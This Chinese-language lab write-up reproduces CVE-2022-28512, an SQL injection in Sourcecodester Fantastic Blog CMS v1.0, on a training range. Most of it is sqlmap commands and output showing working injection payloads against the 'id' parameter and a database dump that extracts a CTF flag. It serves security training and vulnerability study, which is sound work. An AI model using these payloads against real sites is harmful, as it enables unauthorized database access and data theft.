Sourcecodester Fantastic Blog CMS v1.0 SQL 注入漏洞(CVE-2022-28512)

前言

CVE-2022-28512 是一个存在于 Sourcecodester Fantastic Blog CMS v1.0 中的 SQL 注入漏洞。攻击者可以通过 "/fantasticblog/single.php" 中的 id 参数注入恶意 SQL 查询,从而获得对数据库的未经授权的访问和控制。

漏洞详细信息

  • 漏洞描述: 该漏洞允许攻击者通过 "/fantasticblog/single.php"id 参数进行 SQL 注入。
  • 漏洞影响: 攻击者可以利用此漏洞获取敏感数据、修改数据库内容,甚至执行任意 SQL 命令,导致整个系统的安全性受到严重威胁。
  • CVSS评分:
    • CVSS v3.1: 9.8 (Critical)
    • CVSS v2.0: 7.5 (High)
  • CWE ID: CWE-89(SQL 注入)

受影响的软件

  • Sourcecodester Fantastic Blog CMS: v1.0

修复建议

强烈建议用户立即更新 Sourcecodester Fantastic Blog CMS 至最新版本,或者应用官方提供的补丁。同时,在应用程序开发中应实施严格的输入验证和参数化查询,以防止 SQL 注入漏洞。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

实战演练:

提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。
漏洞复现:

用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。
教学培训:

提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。
竞赛与评测:

定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。
资源共享:

平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Sourcecodester Fantastic Blog CMS v1.0 是一个内容管理系统,用于创建和管理博客网站。该系统使用 PHP、MySQL、JavaScript 和 HTML/CSS 构建,旨在提供一个简单且用户友好的博客平台。它主要功能包括用户管理、文章管理和评论管理等。

功能特色

  1. 用户管理:管理员可以创建和管理用户账户,赋予不同的权限,如管理员和普通用户。
  2. 文章管理:用户可以创建、编辑和删除博客文章,包括设置文章的标题、内容和标签等。
  3. 评论管理:用户可以在文章下发表评论,管理员可以审核和管理这些评论,防止垃圾评论的出现。
  4. 多媒体管理:支持上传和管理图片、视频等多媒体文件,以丰富博客内容。
  5. 分类和标签:支持对文章进行分类和添加标签,方便内容的组织和检索。

安装和使用

  1. 服务器要求:需要一个支持 PHP 和 MySQL 的服务器环境,如 XAMPP 或 WAMP。
  2. 数据库配置:下载源码后,配置数据库连接信息,并导入初始数据库文件。
  3. 用户界面:通过简单的界面,用户可以方便地发布和管理博客内容,浏览者可以轻松地阅读和评论文章。

该系统适合个人博客和小型网站的搭建,提供了基础的博客功能,同时源码开放,用户可以根据需要进行二次开发和定制​ (SourceCodester)​​ (SourceCodester)​​ (SourceCodester)​。

漏洞复现

打开靶场

根据题目手动构造 URL

http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1

原首页可以看到是有登录的 

现在咱们能直接构造 URL 访问目标页面说明没有用户验证,直接上 SQLMap 跑它

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch --dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:24:55 /2024-06-29/

[20:24:55] [INFO] testing connection to the target URL
[20:24:55] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:24:55] [INFO] testing if the target URL content is stable
[20:24:56] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[20:24:56] [INFO] testing if GET parameter 'id' is dynamic
[20:24:56] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:24:56] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:24:56] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:24:56] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:24:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:24:57] [WARNING] reflective value(s) found and filtering out
[20:24:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:24:57] [INFO] testing 'Generic inline queries'
[20:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:25:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:25:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:25:09] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:25:12] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable 
[20:25:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:25:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:25:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:25:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:25:12] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[20:25:12] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[20:25:12] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:25:13] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:25:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:25:13] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[20:25:13] [INFO] testing 'MySQL inline queries'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:25:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[20:25:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[20:25:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:25:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:25:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:25:23] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:25:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:25:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:25:24] [INFO] target URL appears to have 9 columns in query
[20:25:25] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 260 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYY

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:25:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:25:25] [INFO] fetching database names
[20:25:26] [INFO] retrieved: 'information_schema'
[20:25:26] [INFO] retrieved: 'performance_schema'
[20:25:26] [INFO] retrieved: 'mysql'
[20:25:26] [INFO] retrieved: 'ctf'
available databases [4]:                                                       
[*] ctf
[*] information_schema
[*] mysql
[*] performance_schema

[20:25:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'

[*] ending @ 20:25:26 /2024-06-29/

                                                                                                                                    
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch -D "ctf" --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:26:21 /2024-06-29/

[20:26:21] [INFO] resuming back-end DBMS 'mysql' 
[20:26:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYY

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:26:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:26:22] [INFO] fetching tables for database: 'ctf'
[20:26:22] [INFO] retrieved: 'titles'
[20:26:22] [INFO] retrieved: 'page_hits'
[20:26:22] [INFO] retrieved: 'membership_userpermissions'
[20:26:22] [INFO] retrieved: 'membership_groups'
[20:26:23] [INFO] retrieved: 'blog_categories'
[20:26:23] [INFO] retrieved: 'membership_userrecords'
[20:26:23] [INFO] retrieved: 'membership_users'
[20:26:23] [INFO] retrieved: 'editors_choice'
[20:26:23] [INFO] retrieved: 'blogs'
[20:26:23] [INFO] retrieved: 'links'
[20:26:23] [INFO] retrieved: 'flag'
[20:26:23] [INFO] retrieved: 'banner_posts'
[20:26:23] [INFO] retrieved: 'membership_grouppermissions'
[20:26:23] [INFO] retrieved: 'visitor_info'
Database: ctf                                                                                                                      
[14 tables]
+-----------------------------+
| banner_posts                |
| blog_categories             |
| blogs                       |
| editors_choice              |
| flag                        |
| links                       |
| membership_grouppermissions |
| membership_groups           |
| membership_userpermissions  |
| membership_userrecords      |
| membership_users            |
| page_hits                   |
| titles                      |
| visitor_info                |
+-----------------------------+

[20:26:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'

[*] ending @ 20:26:23 /2024-06-29/

                                                                                                                                    
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch -D "ctf" -T "flag" --columns
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:26:39 /2024-06-29/

[20:26:39] [INFO] resuming back-end DBMS 'mysql' 
[20:26:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYY

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:26:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:26:40] [INFO] fetching columns for table 'flag' in database 'ctf'
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| flag   | varchar(1024) |
+--------+---------------+

[20:26:40] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'

[*] ending @ 20:26:40 /2024-06-29/

                                                                                                                                    
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/single.php?id=1" --batch -D "ctf" -T "flag" -C "flag" --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:27:13 /2024-06-29/

[20:27:13] [INFO] resuming back-end DBMS 'mysql' 
[20:27:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1' RLIKE (SELECT (CASE WHEN (1569=1569) THEN 1 ELSE 0x28 END))-- DGYW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4914 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4914=4914,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QBlP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7718 FROM (SELECT(SLEEP(5)))VCMl)-- mzYY

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=-1282' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786271,0x4a6e55544a774f4a56556872484d58704a5a4c494d756e756774556e45757257586d564a70677252,0x71717a7171),NULL,NULL,NULL,NULL,NULL#
---
[20:27:13] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:27:13] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{ab5bd2f1-096b-4ed8-928a-59056341e86b} |
+--------------------------------------------+

[20:27:14] [INFO] table 'ctf.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[20:27:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zehz8yh4xe8fzah182w.cloudeci1.ichunqiu.com'

[*] ending @ 20:27:14 /2024-06-29/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/762468.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

JavaScript将参数传递给事件处理程序

本篇文件我们将实现导航栏中&#xff0c;选中时候&#xff0c;会将您选中的进行高亮显示&#xff1b; ● 首先我们来获取我们想要的HTML元素 const nav document.querySelector(.nav);● 接着我们来写选中的高亮显示 nav.addEventListener(mouseover, function (e) { //鼠…

内网穿透小工具

内网穿透小工具 前言 当在本地或者虚拟机&#xff0c;内网搭建了项目&#xff0c;数据库。可是在外网无法访问。下面的两款小工具可以暂时实现内网穿透能力。&#xff08;不支持自定义域名&#xff0c;但是不限制隧道数量&#xff01;且免费&#xff01;免费&#xff01;免费…

【小贪】项目实战——Zero-shot根据文字提示分割出图片目标掩码

目标描述 给定RGB视频或图片&#xff0c;目标是分割出图像中的指定目标掩码。我们需要复现两个Zero-shot的开源项目&#xff0c;分别为IDEA研究院的GroundingDINO和Facebook的SAM。首先使用目标检测方法GroundingDINO&#xff0c;输入想检测目标的文字提示&#xff0c;可以获得…

互联网框架五层模型详解

注&#xff1a;机翻&#xff0c;未校对。 What is the Five Layers Model? The Framework of the Internet Explained 五层模型互联网框架解释 Computer Networks are a beautiful, amazing topic. Networks involve so much knowledge from different fields, from physics…

[OHOS_ERROR]: Please call hb utilities inside ohos source directory

当执行hb set报如下错误时&#xff1a;原因时重新拉取了源码&#xff0c;且源码路径被改了 [OHOS_ERROR]: Please call hb utilities inside ohos source directory 【解决办法】 卸载hb并在源码路径下重新安装 python3 -m pip uninstall ohos-build 安装hb python3 -m pi…

python-逻辑语句

if else语句 不同于C&#xff1a;else if range语句&#xff1a; continue continue的作用是&#xff1a; 中断所在循环的当次执行&#xff0c;直接进入下一次 continue在嵌套循环中的应用 break 直接结束所在的循环 break在嵌套循环中的应用 continue和break&#xff0c;在…

力扣:LCR 024. 反转链表(Java)

目录 题目描述&#xff1a;示例 1&#xff1a;示例 2&#xff1a;代码实现&#xff1a; 题目描述&#xff1a; 给定单链表的头节点 head &#xff0c;请反转链表&#xff0c;并返回反转后的链表的头节点。 示例 1&#xff1a; 输入&#xff1a;head [1,2,3,4,5] 输出&#x…

【嵌入式DIY实例】- LCD ST7735显示DHT11传感器数据

LCD ST7735显示DHT11传感器数据 文章目录 LCD ST7735显示DHT11传感器数据1、硬件准备与接线2、代码实现本文介绍如何将 ESP8266 NodeMCU 板 (ESP-12E) 与 DHT11 (RHT01) 数字湿度和温度传感器连接。 NodeMCU 从 DHT11 传感器读取温度(以 C 为单位)和湿度(以 rH% 为单位)值,…

1.5 Canal 数据同步工具详细教程

欢迎来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;欢迎订阅相关专栏&#xff1a; ⭐️ 全网最全IT互联网公司面试宝典&#xff1a;收集整理全网各大IT互联网公司技术、项目、HR面试真题. ⭐️ AIGC时代的创新与未来&#xff1a;详细讲解AIGC的概念、核心技术、…

【你也能从零基础学会网站开发】关系型数据库中的表(Table)设计结构以及核心组成部分

&#x1f680; 个人主页 极客小俊 ✍&#x1f3fb; 作者简介&#xff1a;程序猿、设计师、技术分享 &#x1f40b; 希望大家多多支持, 我们一起学习和进步&#xff01; &#x1f3c5; 欢迎评论 ❤️点赞&#x1f4ac;评论 &#x1f4c2;收藏 &#x1f4c2;加关注 关系型数据库中…

FTP 文件传输协议:概念、工作原理;上传下载操作步骤

目录 FTP 概念 工作原理 匿名用户 授权用户 FTP软件包 匿名用户上传下载实验步骤 环境配置 下载 上传 wget 授权用户上传下载步骤 root用户登录FTP步骤 监听 设置端口号范围 修改用户家目录 匿名用户 授权用户 FTP 概念 FTP&#xff08;File Transfer Prot…

C语言之线程的学习

线程属于某一个进程 共同点&#xff1a;都能并发 线程共享变量&#xff0c;进程不共享。 多线程任务中&#xff0c;其中某一个线程调用了exit了&#xff0c;其他线程会跟着一起退出 如果是特定的线程就调用pthread_exit 失败返回的是错误号 下面也是

VSCode无法识别 node、npm

一、前提 电脑新安装了node.js&#xff0c;在cmd查看node和npm版本没有问题&#xff0c;但是在VSCode无法识别 1.cmd查看版本&#xff1a; 2.VSCode报错信息&#xff1a; 无法将“npm”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请检查名称的拼写&#xff0c;如果…

C#——Property属性详情

属性 属性&#xff08;Property&#xff09;是类&#xff08;class&#xff09;、结构体&#xff08;structure&#xff09;和接口&#xff08;interface&#xff09;的成员&#xff0c;类或结构体中的成员变量称为字段&#xff0c;属性是字段的扩展&#xff0c;使用访问器&am…

视频转音频:怎样提取视频中的音频?6个提取音频的小技巧(建议收藏)

怎样提取视频中的音频&#xff1f;当我们想从视频中提取出声音时&#xff0c;通常会遇到很多问题。无论是想单独提取出视频里的音频&#xff0c;还是把它转成方便储存或者分享的音频格式&#xff0c;这都会涉及到视频转音频的一个需求。因此&#xff0c;在这篇指南里&#xff0…

如何编写高质量更优雅的代码(Java)

1、函数式接口—FunctionalInterface 好处&#xff1a;高逼格、代码收拢、解藕、统一处理 适用范围&#xff1a;具有共性的接口调用代码 举个栗子&#xff1a; 在我们平时的微服务开发中&#xff0c;调用其他服务的接口&#xff0c;通常要把接口调用部分做异常处理(try catch…

为何交易价格可能超出预期?

当你尝试执行订单时&#xff0c;如果收到“报价超出”的提示&#xff0c;这通常意味着交易无法按你的预期价格成交。对于某些交易者来说&#xff0c;这可能会带来一些困扰&#xff0c;但在外汇等流动性极高的市场中&#xff0c;这种情况是相当常见的。 外汇市场之所以吸引众多…

Python系统教程01

Python 是一门解释性语言&#xff0c;相对更简单、易学&#xff0c;它可以用于解决数学问题、获取与分 析数据、爬虫爬取网络数据、实现复制数学算法等等。 1、print()函数&#xff1a; print()书写时注意所有的符号都是英文符号。print()输出内容时&#xff0c;若要输出字符…

A股低开高走,近3000点,行情要启动了吗?

A股低开高走&#xff0c;近3000点&#xff0c;行情要启动了吗&#xff1f; 今天的A股&#xff0c;让人瞪目结舌了&#xff0c;你们知道是为什么吗&#xff1f;盘面上出现2个重要信号&#xff0c;一起来看看&#xff1a; 1、今天两市低开高走&#xff0c;银行板块护盘指数&…

如何使用AI学习一门编程语言?

无论你是软件开发新手还是拥有几十年的丰富经验&#xff0c;总是需要学习新知识。TIOBE Index追踪50种最受欢迎的编程语言&#xff0c;许多生态系统为职业发展和横向转型提供了机会。鉴于现有技术具有的广度&#xff0c;抽空学习一项新技能并有效运用技能可能困难重重。 最近我…